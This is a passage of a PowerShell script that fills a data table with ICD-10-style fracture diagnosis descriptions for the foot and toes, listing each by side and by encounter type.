$DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, right foot","Nondisplaced fracture of fifth metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, left foot","Nondisplaced fracture of fifth metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, left foot","Nondisplaced fracture of fifth metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, left foot","Nondisplaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, left foot","Nondisplaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, left foot","Nondisplaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, left foot","Nondisplaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, left foot","Nondisplaced fracture of fifth metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, unspecified foot","Nondisplaced fracture of fifth metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, unspecified foot","Nondisplaced fracture of fifth metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, unspecified foot","Nondisplaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, unspecified foot","Nondisplaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, unspecified foot","Nondisplaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, unspecified foot","Nondisplaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, unspecified foot","Nondisplaced fracture of fifth metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right great toe","Displaced unspecified fracture of right great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right great toe","Displaced unspecified fracture of right great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right great toe","Displaced unspecified fracture of right great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right great toe","Displaced unspecified fracture of right great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right great toe","Displaced unspecified fracture of right great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right great toe","Displaced unspecified fracture of right great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right great toe","Displaced unspecified fracture of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left great toe","Displaced unspecified fracture of left great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left great toe","Displaced unspecified fracture of left great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left great toe","Displaced unspecified fracture of left great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left great toe","Displaced unspecified fracture of left great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left great toe","Displaced unspecified fracture of left great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left great toe","Displaced unspecified fracture of left great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left great toe","Displaced unspecified fracture of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified great toe","Displaced unspecified fracture of unspecified great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified great toe","Displaced unspecified fracture of unspecified great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified great toe","Displaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified great toe","Displaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified great toe","Displaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified great toe","Displaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified great toe","Displaced unspecified fracture of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right great toe","Nondisplaced unspecified fracture of right great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right great toe","Nondisplaced unspecified fracture of right great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right great toe","Nondisplaced unspecified fracture of right great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right great toe","Nondisplaced unspecified fracture of right great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right great toe","Nondisplaced unspecified fracture of right great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right great toe","Nondisplaced unspecified fracture of right great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right great toe","Nondisplaced unspecified fracture of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left great toe","Nondisplaced unspecified fracture of left great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left great toe","Nondisplaced unspecified fracture of left great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left great toe","Nondisplaced unspecified fracture of left great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left great toe","Nondisplaced unspecified fracture of left great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left great toe","Nondisplaced unspecified fracture of left great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left great toe","Nondisplaced unspecified fracture of left great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left great toe","Nondisplaced unspecified fracture of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified great toe","Nondisplaced unspecified fracture of unspecified great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified great toe","Nondisplaced unspecified fracture of unspecified great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified great toe","Nondisplaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified great toe","Nondisplaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified great toe","Nondisplaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified great toe","Nondisplaced unspecified fracture of unspecified great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified great toe","Nondisplaced unspecified fracture of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right great toe","Displaced fracture of proximal phalanx of right great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right great toe","Displaced fracture of proximal phalanx of right great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right great toe","Displaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right great toe","Displaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right great toe","Displaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right great toe","Displaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right great toe","Displaced fracture of proximal phalanx of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left great toe","Displaced fracture of proximal phalanx of left great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left great toe","Displaced fracture of proximal phalanx of left great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left great toe","Displaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left great toe","Displaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left great toe","Displaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left great toe","Displaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left great toe","Displaced fracture of proximal phalanx of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified great toe","Displaced fracture of proximal phalanx of unspecified great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified great toe","Displaced fracture of proximal phalanx of unspecified great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified great toe","Displaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified great toe","Displaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified great toe","Displaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified great toe","Displaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified great toe","Displaced fracture of proximal phalanx of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right great toe","Nondisplaced fracture of proximal phalanx of right great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right great toe","Nondisplaced fracture of proximal phalanx of right great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right great toe","Nondisplaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right great toe","Nondisplaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right great toe","Nondisplaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right great toe","Nondisplaced fracture of proximal phalanx of right great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right great toe","Nondisplaced fracture of proximal phalanx of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left great toe","Nondisplaced fracture of proximal phalanx of left great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left great toe","Nondisplaced fracture of proximal phalanx of left great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left great toe","Nondisplaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left great toe","Nondisplaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left great toe","Nondisplaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left great toe","Nondisplaced fracture of proximal phalanx of left great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left great toe","Nondisplaced fracture of proximal phalanx of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified great toe","Nondisplaced fracture of proximal phalanx of unspecified great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified great toe","Nondisplaced fracture of proximal phalanx of unspecified great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified great toe","Nondisplaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified great toe","Nondisplaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified great toe","Nondisplaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified great toe","Nondisplaced fracture of proximal phalanx of unspecified great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified great toe","Nondisplaced fracture of proximal phalanx of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right great toe","Displaced fracture of distal phalanx of right great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right great toe","Displaced fracture of distal phalanx of right great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right great toe","Displaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right great toe","Displaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right great toe","Displaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right great toe","Displaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right great toe","Displaced fracture of distal phalanx of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left great toe","Displaced fracture of distal phalanx of left great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left great toe","Displaced fracture of distal phalanx of left great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left great toe","Displaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left great toe","Displaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left great toe","Displaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left great toe","Displaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left great toe","Displaced fracture of distal phalanx of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified great toe","Displaced fracture of distal phalanx of unspecified great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified great toe","Displaced fracture of distal phalanx of unspecified great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified great toe","Displaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified great toe","Displaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified great toe","Displaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified great toe","Displaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified great toe","Displaced fracture of distal phalanx of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right great toe","Nondisplaced fracture of distal phalanx of right great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right great toe","Nondisplaced fracture of distal phalanx of right great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right great toe","Nondisplaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right great toe","Nondisplaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right great toe","Nondisplaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right great toe","Nondisplaced fracture of distal phalanx of right great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right great toe","Nondisplaced fracture of distal phalanx of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left great toe","Nondisplaced fracture of distal phalanx of left great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left great toe","Nondisplaced fracture of distal phalanx of left great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left great toe","Nondisplaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left great toe","Nondisplaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left great toe","Nondisplaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left great toe","Nondisplaced fracture of distal phalanx of left great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left great toe","Nondisplaced fracture of distal phalanx of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified great toe","Nondisplaced fracture of distal phalanx of unspecified great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified great toe","Nondisplaced fracture of distal phalanx of unspecified great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified great toe","Nondisplaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified great toe","Nondisplaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified great toe","Nondisplaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified great toe","Nondisplaced fracture of distal phalanx of unspecified great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified great toe","Nondisplaced fracture of distal phalanx of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right great toe","Other fracture of right great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right great toe","Other fracture of right great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right great toe","Other fracture of right great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right great toe","Other fracture of right great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right great toe","Other fracture of right great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right great toe","Other fracture of right great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right great toe","Other fracture of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left great toe","Other fracture of left great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left great toe","Other fracture of left great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left great toe","Other fracture of left great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left great toe","Other fracture of left great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left great toe","Other fracture of left great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left great toe","Other fracture of left great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left great toe","Other fracture of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified great toe","Other fracture of unspecified great toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified great toe","Other fracture of unspecified great toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified great toe","Other fracture of unspecified great toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified great toe","Other fracture of unspecified great toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified great toe","Other fracture of unspecified great toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified great toe","Other fracture of unspecified great toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified great toe","Other fracture of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right lesser toe(s)","Displaced unspecified fracture of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right lesser toe(s)","Displaced unspecified fracture of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right lesser toe(s)","Displaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right lesser toe(s)","Displaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right lesser toe(s)","Displaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right lesser toe(s)","Displaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of right lesser toe(s)","Displaced unspecified fracture of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left lesser toe(s)","Displaced unspecified fracture of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left lesser toe(s)","Displaced unspecified fracture of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left lesser toe(s)","Displaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left lesser toe(s)","Displaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left lesser toe(s)","Displaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left lesser toe(s)","Displaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of left lesser toe(s)","Displaced unspecified fracture of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified lesser toe(s)","Displaced unspecified fracture of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified lesser toe(s)","Displaced unspecified fracture of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified lesser toe(s)","Displaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified lesser toe(s)","Displaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified lesser toe(s)","Displaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified lesser toe(s)","Displaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified fracture of unspecified lesser toe(s)","Displaced unspecified fracture of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right lesser toe(s)","Nondisplaced unspecified fracture of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right lesser toe(s)","Nondisplaced unspecified fracture of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right lesser toe(s)","Nondisplaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right lesser toe(s)","Nondisplaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right lesser toe(s)","Nondisplaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right lesser toe(s)","Nondisplaced unspecified fracture of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of right lesser toe(s)","Nondisplaced unspecified fracture of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left lesser toe(s)","Nondisplaced unspecified fracture of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left lesser toe(s)","Nondisplaced unspecified fracture of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left lesser toe(s)","Nondisplaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left lesser toe(s)","Nondisplaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left lesser toe(s)","Nondisplaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left lesser toe(s)","Nondisplaced unspecified fracture of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = 